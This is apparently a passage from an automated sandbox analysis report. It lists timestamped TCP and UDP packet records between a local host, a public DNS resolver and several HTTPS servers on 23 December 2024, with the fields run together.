                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:34.196444035 CET4434999023.219.82.25192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:34.196537971 CET4434999023.219.82.25192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:34.196682930 CET49990443192.168.2.623.219.82.25
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:34.207742929 CET4434999123.219.82.25192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:34.207851887 CET4434999123.219.82.25192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:34.207925081 CET49991443192.168.2.623.219.82.25
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:57.675980091 CET49937443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:57.676009893 CET44349937172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:57.676022053 CET49938443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:57.676054955 CET44349938172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:59.977091074 CET50120443192.168.2.620.198.119.84
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:59.977153063 CET4435012020.198.119.84192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:59.977247953 CET50120443192.168.2.620.198.119.84
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:59.977886915 CET50120443192.168.2.620.198.119.84
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:59.977900028 CET4435012020.198.119.84192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:16:00.203254938 CET49993443192.168.2.6204.79.197.219
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:16:00.203254938 CET49992443192.168.2.6204.79.197.219
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:16:00.203269005 CET44349993204.79.197.219192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:16:00.203274012 CET44349992204.79.197.219192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:16:01.112431049 CET49990443192.168.2.623.219.82.25
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:16:01.112453938 CET4434999023.219.82.25192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:16:01.112473011 CET49991443192.168.2.623.219.82.25
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:16:01.112504959 CET4434999123.219.82.25192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:16:02.256778955 CET4435012020.198.119.84192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:16:02.256860018 CET50120443192.168.2.620.198.119.84
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:16:02.258948088 CET50120443192.168.2.620.198.119.84
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:16:02.258955002 CET4435012020.198.119.84192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:16:02.259208918 CET4435012020.198.119.84192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:16:02.261097908 CET50120443192.168.2.620.198.119.84
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:16:02.261159897 CET50120443192.168.2.620.198.119.84
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:16:02.261167049 CET4435012020.198.119.84192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:16:02.261290073 CET50120443192.168.2.620.198.119.84
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:16:02.307332039 CET4435012020.198.119.84192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:16:02.922624111 CET4435012020.198.119.84192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:16:02.922754049 CET4435012020.198.119.84192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:16:02.922836065 CET50120443192.168.2.620.198.119.84
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:16:02.922976017 CET50120443192.168.2.620.198.119.84
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:16:02.922998905 CET4435012020.198.119.84192.168.2.6

                                                                                                                                                                                                                                                                                                      UDP Packets

                                                                                                                                                                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:03.887559891 CET6030253192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:04.115679979 CET53603021.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:24.473747969 CET5874453192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:24.611607075 CET53587441.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:26.779230118 CET6092953192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:27.168431997 CET53609291.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:42.443167925 CET53512141.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:42.481080055 CET53519991.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:42.618653059 CET5465353192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:42.618839025 CET5288053192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:42.755601883 CET53528801.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:42.755759954 CET53546531.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:45.215033054 CET53639501.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:46.728606939 CET53505631.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:47.169867039 CET53613741.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:58.268357038 CET5591953192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:58.268621922 CET6473553192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:14:58.405580044 CET53647351.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:01.103291035 CET5099053192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:01.103703976 CET6436653192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:01.650930882 CET6151553192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:01.651113033 CET5815053192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:01.798985004 CET53581501.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:01.810724020 CET53615151.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:02.519176006 CET6539653192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:02.519335032 CET6160353192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:02.519687891 CET4928853192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:02.519819975 CET6346853192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:02.530854940 CET6304653192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:02.531002998 CET5887053192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:02.656375885 CET53616031.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:02.656404018 CET53653961.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:02.656529903 CET53634681.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:02.658123970 CET53492881.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:02.671454906 CET53630461.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:02.671958923 CET53588701.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:03.812201977 CET6541953192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:03.812444925 CET4947853192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:03.826613903 CET6154753192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:03.826754093 CET5218953192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:03.951982975 CET53654191.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:03.952789068 CET53494781.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:03.959671974 CET5318053192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:03.959801912 CET5406053192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:04.097448111 CET5665853192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:04.097655058 CET5064253192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:04.097975016 CET53540601.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:04.234858990 CET53506421.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:05.417699099 CET51306443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:05.728650093 CET51306443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:06.254906893 CET52133443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:06.328660011 CET51306443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:06.506289005 CET44351306172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:06.507558107 CET44351306172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:06.507867098 CET51306443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:06.507889986 CET44351306172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:06.507903099 CET44351306172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:06.508387089 CET51306443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:06.509782076 CET51306443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:06.514400005 CET51306443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:06.558053970 CET52133443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:06.644979954 CET44351306172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:06.811518908 CET51306443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:06.818459034 CET51306443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:06.827172995 CET44351306172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:06.827281952 CET44351306172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:06.827296019 CET44351306172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:06.827306986 CET44351306172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:06.827594995 CET51306443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:06.827805042 CET51306443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:06.833602905 CET44351306172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:06.836086035 CET44351306172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:06.836132050 CET44351306172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:06.836620092 CET51306443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:07.126934052 CET44351306172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:07.130099058 CET44351306172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:07.133616924 CET44351306172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:07.135222912 CET44351306172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:07.135550022 CET51306443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:07.142244101 CET44351306172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:07.171974897 CET52133443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:07.172013044 CET51306443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:07.341672897 CET44352133172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:07.341700077 CET44352133172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:07.341721058 CET44352133172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:07.341732979 CET44352133172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:07.342406988 CET52133443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:07.345452070 CET52133443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:07.360282898 CET52133443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:07.485594988 CET44352133172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:07.892954111 CET44352133172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:07.892961025 CET44352133172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:07.892965078 CET44352133172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:07.892970085 CET44352133172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:07.893033028 CET44352133172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:07.893039942 CET44352133172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:07.893042088 CET44352133172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:07.893445015 CET52133443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:07.893577099 CET52133443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:07.893748045 CET52133443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:08.207828045 CET44352133172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:08.237226009 CET52133443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:09.079799891 CET51306443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:09.080048084 CET51306443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:09.104105949 CET51306443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:09.104545116 CET51306443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:09.231499910 CET51306443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:09.232053041 CET51306443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:09.233994961 CET52133443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:09.234330893 CET52133443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:09.398930073 CET44351306172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:09.399530888 CET44351306172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:09.399543047 CET44351306172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:09.402410030 CET51306443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:09.404697895 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:09.405107975 CET61006443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:09.420425892 CET44351306172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:09.421446085 CET44351306172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:09.421590090 CET44351306172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:09.427447081 CET51306443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:09.550071001 CET44351306172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:09.550101995 CET44352133172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:09.550246954 CET44352133172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:09.550261974 CET44351306172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:09.550275087 CET44352133172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:09.550292015 CET44351306172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:09.550563097 CET51306443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:09.550796032 CET52133443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:09.705120087 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:09.705717087 CET61006443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:10.315855980 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:10.315972090 CET61006443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:10.489411116 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:10.490499020 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:10.490537882 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:10.490622044 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:10.490634918 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:10.490689993 CET44361006104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:10.491873980 CET44361006104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:10.491991043 CET44361006104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:10.492048025 CET44361006104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:10.492062092 CET44361006104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:10.492275000 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:10.494055033 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:10.494534969 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:10.494728088 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:10.495143890 CET61006443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:10.495554924 CET61006443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:10.496742010 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:10.496994019 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:10.497021914 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:10.497108936 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:10.630743027 CET44361006104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:10.631036043 CET61006443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:10.631078005 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:10.631261110 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:10.815339088 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:10.815351963 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:10.815418959 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:10.815428972 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:10.815438986 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:10.815448999 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:10.815459967 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:10.815592051 CET44361006104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:10.815726042 CET44361006104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:10.815836906 CET44361006104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:10.815851927 CET44361006104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:10.815860987 CET44361006104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:10.816121101 CET61006443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:10.816242933 CET61006443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:10.816813946 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:10.817028046 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:10.823120117 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:10.823997021 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:10.833410025 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:10.845396042 CET61006443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:10.861185074 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:10.872925043 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:10.873280048 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:10.881752014 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:10.902945042 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:10.903147936 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:10.903633118 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:10.905380964 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:10.905525923 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:10.924074888 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:10.944421053 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:10.944617987 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:10.946435928 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:10.947711945 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:10.947873116 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:10.951579094 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:10.952389956 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:10.952414989 CET44361006104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:10.959276915 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:10.959464073 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:10.969434023 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:10.974631071 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:10.974807024 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:10.982706070 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:10.992110968 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:10.992485046 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:11.000474930 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:11.008522987 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:11.008846045 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:11.017064095 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:11.026400089 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:11.026563883 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:11.034852028 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:11.043186903 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:11.043363094 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:11.052983999 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:11.061407089 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:11.061574936 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:11.069677114 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:11.077776909 CET44352290104.70.121.51192.168.2.6
